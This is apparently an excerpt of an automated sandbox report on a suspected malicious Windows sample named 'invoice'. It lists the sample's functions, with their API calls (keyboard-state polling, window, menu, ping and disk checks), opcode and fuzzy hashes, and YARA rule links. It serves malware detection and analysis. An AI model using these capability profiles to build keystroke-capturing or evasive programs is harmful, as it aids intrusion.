                        • String ID:
                        • API String ID: 1246142700-0
                        • Opcode ID: d16f0dcfbed63a9dc503d4ed3f890518b960ade6c3534211ca13a0982c921d8e
                        • Instruction ID: 317d312c15311e539a8549e8893c79ec02b4870d3aa0bb1c03c7ede81e02c8eb
                        • Opcode Fuzzy Hash: d16f0dcfbed63a9dc503d4ed3f890518b960ade6c3534211ca13a0982c921d8e
                        • Instruction Fuzzy Hash: 9CB1FA75A00109AFDB14EFA5CC88DAEBBB9FF88314B148059F809EB251DB35EE41DB50
                        Function 00FE034D Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00FE03C8
                        • SetKeyboardState.USER32(?), ref: 00FE0433
                        • GetAsyncKeyState.USER32(000000A0), ref: 00FE0453
                        • GetKeyState.USER32(000000A0), ref: 00FE046A
                        • GetAsyncKeyState.USER32(000000A1), ref: 00FE0499
                        • GetKeyState.USER32(000000A1), ref: 00FE04AA
                        • GetAsyncKeyState.USER32(00000011), ref: 00FE04D6
                        • GetKeyState.USER32(00000011), ref: 00FE04E4
                        • GetAsyncKeyState.USER32(00000012), ref: 00FE050D
                        • GetKeyState.USER32(00000012), ref: 00FE051B
                        • GetAsyncKeyState.USER32(0000005B), ref: 00FE0544
                        • GetKeyState.USER32(0000005B), ref: 00FE0552
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                        • Instruction ID: a9f58c313e79120955c437b9a6738fc95db125c154c6db8efc5a465255135e6c
                        • Opcode Fuzzy Hash: 39934009732a92e584e6f0f5a716aa782012b69d67a6ab313cbb68c88661502f
                        • Instruction Fuzzy Hash: 2851C930D087C91AFB35DB6289107AEBFB49F11390F4C459995C2561C3DEA49ACCDB61
                        Function 00FDC529 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 00FDC545
                        • GetWindowRect.USER32(00000000,?), ref: 00FDC557
                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FDC5B5
                        • GetDlgItem.USER32(?,00000002), ref: 00FDC5C0
                        • GetWindowRect.USER32(00000000,?), ref: 00FDC5D2
                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FDC626
                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC634
                        • GetWindowRect.USER32(00000000,?), ref: 00FDC645
                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FDC688
                        • GetDlgItem.USER32(?,000003EA), ref: 00FDC696
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FDC6B3
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00FDC6C0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                        • Instruction ID: 4de1aa8737063d08814e0fc356b4fbea059fba9d97dc3cf253e3359a43ea06cc
                        • Opcode Fuzzy Hash: 6f1c7a528f9f5c349aa7e7f5e4e151bc03c9954ea148d422dc88734c0647c53e
                        • Instruction Fuzzy Hash: 5D513171B00206ABDB28CF79DD85B6EBBBAFB88310F148129F519D7294DB719D00DB50
                        Function 00F8201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F82036,?,00000000,?,?,?,?,00F816CB,00000000,?), ref: 00F81B9A
                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F820D3
                        • KillTimer.USER32(-00000001,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00F8216E
                        • DestroyAcceleratorTable.USER32(00000000), ref: 00FBBE26
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBE57
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBE6E
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F816CB,00000000,?,?,00F81AE2,?,?), ref: 00FBBE8A
                        • DeleteObject.GDI32(00000000), ref: 00FBBE9C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: a651dd2909d61caf698cff46fe13c308429c4f0a5593a839a5354c15e5b5978e
                        • Instruction ID: e595c1561e1dbb63f87ef2dd4311e7e1c6436a175aa04369cc7ded495fd9cbc2
                        • Opcode Fuzzy Hash: a651dd2909d61caf698cff46fe13c308429c4f0a5593a839a5354c15e5b5978e
                        • Instruction Fuzzy Hash: 4C61AB35900A01DFDB36AF15D988BA9B7F1FF40322F20852CE5829A564C77AB881EF50
                        Function 00F821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                        • GetSysColor.USER32(0000000F), ref: 00F821D3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: d59fef979492450ff141f4bce574a01e66a6796a74c28502eddd1d2fedeef38e
                        • Instruction ID: 65fc9dcc9e7a92281d1eee6a5c3fd853308e55177d040b6f74e665886aa5a2a9
                        • Opcode Fuzzy Hash: d59fef979492450ff141f4bce574a01e66a6796a74c28502eddd1d2fedeef38e
                        • Instruction Fuzzy Hash: 8041B2315005409BEB726F28EC88BF93B65EB06731F144365FDA58A1E5C7369C42FB61
                        Function 00FEA931 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?,0100F910), ref: 00FEA995
                        • GetDriveTypeW.KERNEL32(00000061,010389A0,00000061), ref: 00FEAA5F
                        • _wcscpy.LIBCMT ref: 00FEAA89
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharDriveLowerType_wcscpy
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2820617543-1000479233
                        • Opcode ID: 131ce7c69ed85e0d0e78740fc7f0707e234737761f84937ea6759c66f63c0f18
                        • Instruction ID: 17671694534645fb23b21c8b59ee65e8621def1640acffb62c6534ed6d5569d9
                        • Opcode Fuzzy Hash: 131ce7c69ed85e0d0e78740fc7f0707e234737761f84937ea6759c66f63c0f18
                        • Instruction Fuzzy Hash: 6A51ED315083419BC314EF15CCD1AAEB7A9FF81B10F14492EF4925B2A2DB38E909EB53
                        Function 00F89997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __i64tow__itow__swprintf
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 421087845-2263619337
                        • Opcode ID: 71d9a20bfac28be8ecdf2a70cc0d28bd701a99a1ae63bb908df115a2c0f1664f
                        • Instruction ID: cca01cb5579fa21f5b0b0792bd2923d3fd1db3e581667929ddf1d895bc640bb3
                        • Opcode Fuzzy Hash: 71d9a20bfac28be8ecdf2a70cc0d28bd701a99a1ae63bb908df115a2c0f1664f
                        • Instruction Fuzzy Hash: B5412772A08205AFDB24AF35DC42FB673E8EF45310F24446EF049D7251EA75D901EB10
                        Function 01007184 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0100719C
                        • CreateMenu.USER32 ref: 010071B7
                        • SetMenu.USER32(?,00000000), ref: 010071C6
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01007253
                        • IsMenu.USER32(?), ref: 01007269
                        • CreatePopupMenu.USER32 ref: 01007273
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010072A0
                        • DrawMenuBar.USER32 ref: 010072A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                        • String ID: 0$F
                        • API String ID: 176399719-3044882817
                        • Opcode ID: 59c25d8c92cbe3eddc9fa068fa7ea64d7ea398bbb8d90bd475bf0c7a43534e48
                        • Instruction ID: be8eb650bb52de3abc961c323b760e4d7ae880e0e31656023995975378fc92de
                        • Opcode Fuzzy Hash: 59c25d8c92cbe3eddc9fa068fa7ea64d7ea398bbb8d90bd475bf0c7a43534e48
                        • Instruction Fuzzy Hash: 28416D74A01205EFEB21DF68D884A9A7BF9FF49300F144169FE85A7390D736A910DFA0
                        Function 010074ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                        Download Yara Rule
                        APIs
                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 01007590
                        • CreateCompatibleDC.GDI32(00000000), ref: 01007597
                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 010075AA
                        • SelectObject.GDI32(00000000,00000000), ref: 010075B2
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 010075BD
                        • DeleteDC.GDI32(00000000), ref: 010075C6
                        • GetWindowLongW.USER32(?,000000EC), ref: 010075D0
                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010075E4
                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010075F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                        • String ID: static
                        • API String ID: 2559357485-2160076837
                        • Opcode ID: a6ef3d225d3261474a4dbc4a9054d5822e80da515c117434a2f57a1d91a77d5e
                        • Instruction ID: 225403eafade4c5bdbe676294649d723774c841dfb6e7b28483f59889edfafa6
                        • Opcode Fuzzy Hash: a6ef3d225d3261474a4dbc4a9054d5822e80da515c117434a2f57a1d91a77d5e
                        • Instruction Fuzzy Hash: 03316F71100116BBEF239F68DC08FDA3BA9FF09721F110214FA95A61D0CB7AE851EB64
                        Function 00FA6F80 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FA6FBB
                          • Part of subcall function 00FA8CA8: __getptd_noexit.LIBCMT ref: 00FA8CA8
                        • __gmtime64_s.LIBCMT ref: 00FA7054
                        • __gmtime64_s.LIBCMT ref: 00FA708A
                        • __gmtime64_s.LIBCMT ref: 00FA70A7
                        • __allrem.LIBCMT ref: 00FA70FD
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA7119
                        • __allrem.LIBCMT ref: 00FA7130
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA714E
                        • __allrem.LIBCMT ref: 00FA7165
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA7183
                        • __invoke_watson.LIBCMT ref: 00FA71F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                        • String ID:
                        • API String ID: 384356119-0
                        • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                        • Instruction ID: bf3fd6af1165751c994b8c68590cb42c64debd4acd80e04799e3041d5c2b097e
                        • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                        • Instruction Fuzzy Hash: 8471D7F2E00716ABE714AE69CC41F9AB3E8AF56334F14412AF514D7281F774EA40AB90
                        Function 00FE281F Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FE283A
                        • GetMenuItemInfoW.USER32(01045890,000000FF,00000000,00000030), ref: 00FE289B
                        • SetMenuItemInfoW.USER32(01045890,00000004,00000000,00000030), ref: 00FE28D1
                        • Sleep.KERNEL32(000001F4), ref: 00FE28E3
                        • GetMenuItemCount.USER32(?), ref: 00FE2927
                        • GetMenuItemID.USER32(?,00000000), ref: 00FE2943
                        • GetMenuItemID.USER32(?,-00000001), ref: 00FE296D
                        • GetMenuItemID.USER32(?,?), ref: 00FE29B2
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FE29F8
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2A0C
                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE2A2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                        • String ID:
                        • API String ID: 4176008265-0
                        • Opcode ID: 37fd6b7f3b11b0a4c9373b0caaa1ad4461bca07f110f616513464e849df936f3
                        • Instruction ID: 4cdc13b4b39acbc3b202f08bef06b99d09f48ae0d4323e30d8376ea0a9a87187
                        • Opcode Fuzzy Hash: 37fd6b7f3b11b0a4c9373b0caaa1ad4461bca07f110f616513464e849df936f3
                        • Instruction Fuzzy Hash: 9061A0B0900289AFDB71CF65CD88AAE7BBDEB05714F140159F842A3245E73AAD05FB61
                        Function 01006F55 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01006FD7
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01006FDA
                        • GetWindowLongW.USER32(?,000000F0), ref: 01006FFE
                        • _memset.LIBCMT ref: 0100700F
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01007021
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01007099
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow_memset
                        • String ID:
                        • API String ID: 830647256-0
                        • Opcode ID: ce8717b0a8dd544469ab2be0b585b49a7cdd4de685e12d61fe33914449a54aa4
                        • Instruction ID: 1f521f2ebecd47aca51554609afcc05d4c4197acde563f3b4f00e74933c2fe24
                        • Opcode Fuzzy Hash: ce8717b0a8dd544469ab2be0b585b49a7cdd4de685e12d61fe33914449a54aa4
                        • Instruction Fuzzy Hash: 18618F75A00208EFEB21DFA8CC80EEE77F9EB09700F100199FA94AB2D1C775A951DB50
                        Function 00FD6EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FD6F15
                        • SafeArrayAllocData.OLEAUT32(?), ref: 00FD6F6E
                        • VariantInit.OLEAUT32(?), ref: 00FD6F80
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FD6FA0
                        • VariantCopy.OLEAUT32(?,?), ref: 00FD6FF3
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FD7007
                        • VariantClear.OLEAUT32(?), ref: 00FD701C
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00FD7029
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD7032
                        • VariantClear.OLEAUT32(?), ref: 00FD7044
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FD704F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: 65e728be7a1aa52b8f82dec0d39f158b2f896c5d5a5ba1a1ac82c0a39aa746cf
                        • Instruction ID: eb7201ab1887f0e9ba9aa1d2d8c00a16ceaafc6533fbd5c5028664c5bc225b41
                        • Opcode Fuzzy Hash: 65e728be7a1aa52b8f82dec0d39f158b2f896c5d5a5ba1a1ac82c0a39aa746cf
                        • Instruction Fuzzy Hash: 9B41A1319002199FCB21EFA4D8889EDBBB9FF08314F05802AF945E7351DB35A945EF90
                        Function 00FF5848 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 00FF58A9
                        • inet_addr.WSOCK32(?), ref: 00FF58EE
                        • gethostbyname.WSOCK32(?), ref: 00FF58FA
                        • IcmpCreateFile.IPHLPAPI ref: 00FF5908
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF5978
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FF598E
                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00FF5A03
                        • WSACleanup.WSOCK32 ref: 00FF5A09
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: d55eac5c9c17622e8f93585aad2830b367abc7534b868ecbd2dfb478bbbf9a81
                        • Instruction ID: c4cdb20cf2bcc929e584cb79ad4d76ed0c97383ed13a2b5c5b2424d9f46a8194
                        • Opcode Fuzzy Hash: d55eac5c9c17622e8f93585aad2830b367abc7534b868ecbd2dfb478bbbf9a81
                        • Instruction Fuzzy Hash: 44518131604701DFD725AF24CC49B7A77E4EF49B20F144529FA96DB2A1DBB4E900EB42
                        Function 00FEB54F Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEB55C
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FEB5D2
                        • GetLastError.KERNEL32 ref: 00FEB5DC
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00FEB649
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: e69771e72d166c0382b527ed935037979ab6e343e93fd14c17185deca55f1e2f
                        • Instruction ID: d25a30b195b27e9f2fd9a3e2d24a3f78f37b6cd13e84b12b517feab8c5d26505
                        • Opcode Fuzzy Hash: e69771e72d166c0382b527ed935037979ab6e343e93fd14c17185deca55f1e2f
                        • Instruction Fuzzy Hash: 1131B235A0024A9FCB15EFA6CC85EFE77B8EF44310F14819AF501DB291DB759A41EB90
